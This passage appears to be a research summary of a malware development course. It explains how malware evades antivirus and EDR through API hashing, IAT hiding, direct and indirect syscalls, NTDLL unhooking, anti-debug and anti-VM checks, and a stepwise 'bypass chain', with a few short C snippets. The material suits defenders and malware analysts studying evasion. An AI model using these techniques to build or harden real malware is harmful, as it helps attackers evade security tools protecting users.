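The comparison-by-hash idea can be shown in isolation with ordinary strings. The sketch below is an illustration only, not the course's code: the names djb2 and find_by_hash and the sample string table are hypothetical, and the hash uses the same DJB2 recurrence as above, with each character cast to unsigned char so that bytes above 0x7F are not sign-extended.

```c
#include <stddef.h>
#include <stdint.h>

/* DJB2: start at 5381, then hash = hash * 33 + c for every byte. */
uint32_t djb2(const char *s) {
    uint32_t hash = 5381;
    while (*s) {
        hash = ((hash << 5) + hash) + (unsigned char)*s;
        s++;
    }
    return hash;
}

/* Return the index of the first string whose hash equals target, or -1.
   Only hash values are compared; the target string itself is never needed. */
int find_by_hash(const char *const *names, size_t count, uint32_t target) {
    for (size_t i = 0; i < count; i++) {
        if (djb2(names[i]) == target) {
            return (int)i;
        }
    }
    return -1;
}
```

Because DJB2 is a 32-bit non-cryptographic hash, two different strings can collide, so a lookup table should be checked for duplicate hash values when it is built.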

IAT Hiding & Obfuscation

The IAT (Import Address Table) contains a list of all functions that a program uses — information that is extremely valuable to AV. IAT Hiding is a technique to remove or conceal this information, preventing AV from knowing which APIs the program uses simply by checking the IAT.

Method 1: Dynamic Resolution

Instead of importing APIs at compile time (which leaves traces in the IAT), use GetModuleHandle + GetProcAddress at runtime to obtain function addresses. However, directly calling GetModuleHandle and GetProcAddress still leaves traces in the IAT.

Method 2: Custom GetProcAddress & GetModuleHandle

Implement custom versions of GetProcAddress and GetModuleHandle by parsing PE headers directly. The custom GetModuleHandle traverses PEB → InMemoryOrderModuleList to find DLLs; the custom GetProcAddress parses the DLL's Export Table to find functions by name or hash.

API Hashing

Combines String Hashing with IAT Hiding: instead of using string names, use the hash of API names to find functions. This technique completely removes API name strings from the binary, making static analysis much more difficult.

Compile-Time API Hashing

Takes API Hashing a step further: hashes are calculated at compile time using constexpr (in C++) or preprocessor macros, leaving no strings in the binary. At runtime, only pre-calculated hash values are used to resolve APIs.

API Hooking

API Hooking is a technique that intercepts and modifies the behavior of API functions by modifying code at the function's address. It is both a tool used by EDR for monitoring and a technique that malware can utilize. The main hooking methods include:

Detours

Microsoft Detours is a widely used hooking library. It works by overwriting the first 5+ bytes of the target function with a jump instruction to the hook (detour) function. The displaced original instructions are preserved in a trampoline, which ends with a jump back into the rest of the target function. When the original function is called, the execution flow is redirected to the hook function, which can inspect/modify parameters before calling the original function through the trampoline or skip it entirely.

MinHook Library

MinHook is a lightweight hooking library that supports hooking multiple functions simultaneously. It provides a simple API: MH_Initialize, MH_CreateHook, MH_EnableHook.

API Hooking Using Windows APIs

Hooking using pure Windows APIs without external libraries. The technique: change memory protection, write jump instructions, restore protection. Can be used to build keyloggers (hook GetAsyncKeyState or use SetWindowsHookEx) or shellcode injection monitors.

Syscalls

Syscalls provide a mechanism to call directly into kernel mode, bypassing the WinAPI and ntdll.dll layers. EDRs commonly hook functions in ntdll.dll to monitor API calls — by calling syscalls directly, malware completely bypasses userland hooks. However, syscall numbers change between Windows versions, so techniques are needed to determine the correct syscall number at runtime.

Standard Flow (can be hooked by EDR): Application -> kernel32.dll -> ntdll.dll -> syscall -> Kernel

Direct Syscall (bypasses EDR userland hooks): Application -> syscall instruction -> Kernel

Indirect Syscall (more stealthy): Application -> return to ntdll (syscall; ret) -> Kernel

SysWhispers

SysWhispers is a tool that automatically generates syscall stubs for NTAPI functions. It generates assembly code containing the syscall number and stub code for each function. SysWhispers2 improves upon this by automatically resolving syscall numbers at runtime through a sorting algorithm. SysWhispers3 adds support for indirect syscalls and other advanced techniques.

c
// SysWhispers2 - auto-resolve syscall number at runtime
// Generated stub for NtAllocateVirtualMemory
EXTERN_C NTSTATUS NtAllocateVirtualMemory(
    HANDLE ProcessHandle,
    PVOID* BaseAddress,
    ULONG_PTR ZeroBits,
    PSIZE_T RegionSize,
    ULONG AllocationType,
    ULONG Protect);

// Implementation auto-finds syscall number
// by sorting functions in ntdll export table

Hell's Gate

Hell's Gate is a technique for resolving syscall numbers at runtime by directly reading the code of ntdll.dll in memory. If EDR has already hooked a function in ntdll, the first bytes will be replaced with a jump instruction. Hell's Gate detects hooks by checking the first bytes of the function: if it starts with mov r10, rcx followed by mov eax, SSN (bytes 4C 8B D1 B8), it has not been hooked and the syscall number can be read from the bytes that follow; if it starts with a jump instruction, it has been hooked.

c
// Hell's Gate - Resolve syscall number from ntdll
// Check if function is hooked
// mov r10, rcx    -> 4C 8B D1
// mov eax, SSN    -> B8 XX XX 00 00
// If first byte is 0x4C -> not hooked, extract SSN
// If first byte is 0xE9 or 0xFF -> hooked

typedef struct _SYSCALL_ENTRY {
    DWORD dwSSN;
    PVOID pSyscallAddr;
} SYSCALL_ENTRY;

// Find unhooked syscall address
// (jmp to syscall; ret instruction in ntdll)
// Used for indirect syscalls

Anti-Analysis

Anti-analysis techniques help malware remain undetected for longer periods, providing additional time to modify code and make it harder to detect. The goal is not to make analysis impossible, which cannot be achieved, but to make the analysis process more time-consuming.

IsDebuggerPresent

The simplest function to detect a debugger. However, directly calling the WinAPI's IsDebuggerPresent is suspicious and can be bypassed using ScyllaHide. A better approach: check PEB.BeingDebugged directly.

c
// Custom IsDebuggerPresent - check PEB directly
BOOL IsDebuggerPresent2() {
#ifdef _WIN64
    PPEB pPeb = (PEB*)(__readgsqword(0x60));
#elif _WIN32
    PPEB pPeb = (PEB*)(__readfsdword(0x30));
#endif
    return pPeb->BeingDebugged;
}

NtQueryInformationProcess

Use NtQueryInformationProcess with ProcessDebugPort (class 7) to check for a debugger. If it returns a non-zero value, the process is being debugged. This technique is harder to bypass because it queries the kernel object directly.

Hardware Breakpoints Detection

Detect hardware breakpoints by examining the thread context — specifically the debug registers DR0-DR3 (breakpoint addresses) and DR7 (breakpoint controls). If any of DR0-DR3 are non-zero, a debugger has placed hardware breakpoints.

Timing Checks

Use GetTickCount64 or QueryPerformanceCounter to measure time between two points in the code. If the time is abnormally long, a debugger may be single-stepping through the code. Simple but effective technique.

Self-Deletion

Delete the malware's own executable file after it has started running, removing the on-disk artifact. Use DeleteFile combined with MoveFileEx using the MOVEFILE_DELAY_UNTIL_REBOOT flag to mark for deletion on restart, or delete directly by opening the file with FILE_FLAG_DELETE_ON_CLOSE.

Anti-Virtual Environments

Anti-VM techniques help malware detect whether it is running in a virtual machine or sandbox. If a virtual environment is detected, the malware will execute benign code or stop entirely. This is an effective way to avoid analysis by automated sandbox systems (Cuckoo, Any.run, CrowdStrike Sandbox).

Hardware Specs Check

Check hardware specifications: RAM below 4GB, CPU cores below 2, disk size below 60GB — all indicators of a VM. Use GlobalMemoryStatusEx, GetSystemInfo, and GetDiskFreeSpaceExW.

Machine Resolution Check

VMs often use default resolutions (800x600, 1024x768). Check using GetSystemMetrics with SM_CXSCREEN and SM_CYSCREEN.

Filename Check

Some sandboxes name files according to specific patterns (hash, sample, malware). Check the current executable's filename.

Running Processes Check

Check for VM-specific processes: vmtoolsd.exe, vmwaretray.exe, vboxservice.exe, xenservice.exe.

User Interaction Check

Sandboxes typically lack user interaction. Check click counts, idle time, and cursor position. If there is no interaction for an extended period, the malware may be running in a sandbox.

Multiple Delay Execution Techniques

Sandboxes often have timeouts to avoid infinite execution. Use various delay techniques to outlast them: WaitForSingleObject, MsgWaitForMultipleObjectsEx, NtWaitForSingleObject, NtDelayExecution. Each technique has unique characteristics and is harder to patch than a simple Sleep call.

API Hammering

API Hammering is a technique that consumes CPU time by calling ineffective APIs repeatedly. Sandboxes often accelerate time (fast-forward Sleep), but API Hammering forces the sandbox to execute each API call, making the analysis time very long and potentially exceeding the sandbox's timeout.

EDR Bypass & NTDLL Unhooking

EDRs (Endpoint Detection and Response) hook functions in ntdll.dll to monitor API calls. NTDLL Unhooking is a technique that restores the original code of ntdll.dll, removing EDR hooks. There are several unhooking methods:

NTDLL Unhooking from Disk

Read a clean copy of ntdll.dll from disk (C:\Windows\System32\ntdll.dll), compare it with the loaded version in memory, and overwrite the text section of the in-memory version with the clean copy from disk. Use CreateFileW + ReadFile or memory mapping to read the file.

NTDLL Unhooking from KnownDlls Directory

KnownDlls is a special directory in Windows that contains section objects for system DLLs, including ntdll.dll. These section objects contain clean (unhooked) copies of the DLLs. Use NtOpenSection + NtMapViewOfSection to map the clean copy, then copy the text section to the loaded ntdll.dll.

NTDLL Unhooking from Suspended Process

Create a new process in a suspended state (e.g., notepad.exe). This new process has a clean ntdll.dll because the EDR installs its hooks only after the process has initialized. Map ntdll.dll from the suspended process, copy the text section, and unmap.

NTDLL Unhooking from Web Server

Download a clean copy of ntdll.dll from a remote server, compare and overwrite the text section. This method bypasses all local hooking mechanisms but requires a network connection.

Indirect Syscalls — HellsHall

Direct Syscalls bypass userland hooks but leave a trace: the return address on the stack points to a memory region not belonging to ntdll.dll, which EDR can detect through return address checking. Indirect Syscalls solve this problem by executing the syscall instruction from within ntdll.dll (at a legitimate address), making the return address appear normal.

HellsHall combines Hell's Gate (resolve SSN) and Halo's Gate (find unhooked syscall instructions in ntdll) to perform indirect syscalls. The process: find the SSN using the Hell's Gate method, find the address of a syscall; ret instruction within ntdll, and call that address. The return address on the stack will then belong to ntdll, bypassing return address checking.

Direct vs Indirect Syscalls Comparison

Direct Syscall: The syscall instruction resides in malware code. The return address on the stack points to the malware's memory region → easily detected by return address validation.

Indirect Syscall: The syscall instruction resides in ntdll.dll. The return address on the stack points to an ntdll region → appears like a legitimate function call, harder to detect.

Bypassing AVs

Effectively bypassing AV requires combining multiple techniques discussed in the previous sections. No single technique is sufficient to bypass all security solutions — a multi-layered (reverse defense-in-depth) approach is needed.

Malware Bypass Chain (combining multiple techniques):

1. Payload Encryption (AES/RC4) -> Avoid static/signature detection
2. Payload Obfuscation (UUID/IPv4/MAC) -> Reduce entropy, appear as legitimate data
3. IAT Hiding + API Hashing -> Conceal API imports
4. NTDLL Unhooking -> Remove EDR userland hooks
5. Indirect Syscalls -> Bypass return address checking
6. Anti-Analysis + Anti-VM -> Avoid sandbox/debugger analysis
7. Mapping Injection / Function Stomping -> Avoid VirtualAllocEx/WriteProcessMemory detection
8. PPID Spoofing + Process Argument Spoofing -> Avoid behavioral detection

Binary Entropy Reduction

Encrypted payloads have high entropy — a suspicious indicator for AV. Entropy reduction techniques: insert legitimate strings, pad with the same byte, remove the CRT library (reduces size), use the EntropyReducer tool. The goal: reduce entropy to a level close to that of a normal binary.

CRT Library Removal

Removing the C Runtime Library significantly reduces binary size and entropy. Replace CRT functions with custom implementations: replace memcpy with a loop, replace printf with WriteConsoleA, etc. Set a custom entry point symbol to avoid needing CRT startup code.

IAT Camouflage

The compiler's dead-code elimination may remove "fake" imports added to disguise the real IAT. Use #pragma comment(linker, "/include:...") or volatile references to force the compiler to retain fake imports.

Block DLL Policy

Block DLL Policy is a technique that prevents EDR DLLs from being loaded into newly created processes. Use PROC_THREAD_ATTRIBUTE_MITIGATION_POLICY with the PROCESS_CREATION_MITIGATION_POLICY_BLOCK_NON_MICROSOFT_BINARIES_ALWAYS_ON flag. Can be applied to both local and remote processes.

References

This research document was compiled and authored based on the Malware Development course by qa210, covering 33 chapters from fundamentals to advanced topics. The content spans the entire MDLC — from basic Windows Architecture, PE Format, and DLL knowledge to advanced techniques like Indirect Syscalls, EDR Bypass, and NTDLL Unhooking.

Additional Topics Covered in the Full Course

Topic: Description
Malware Signing: Digitally sign malware to bypass SmartScreen and trust verification
Payload Execution Control: Use Semaphore, Mutex, and Events to control payload execution flow
PE Header Analysis: Deep analysis of PE headers: RVAs, Export Table, IAT, Undocumented structures
Brute Force Decryption: Encrypt keys using custom functions, brute force to decrypt at runtime
NtCreateUserProcess: Create processes using NTAPI instead of CreateProcess, combined with PPID spoofing and block DLL
API Hammering: Consume CPU time to outlast sandbox timeouts

Source

Malware Development course by qa210 — complete material with 33 chapters including theory, code demos, and practice exercises. This document summarizes the key concepts; reading the original material is recommended for a deeper understanding of each technique and hands-on practice with full code examples.

QA210
Research — Malware Development Fundamentals — W4LLZ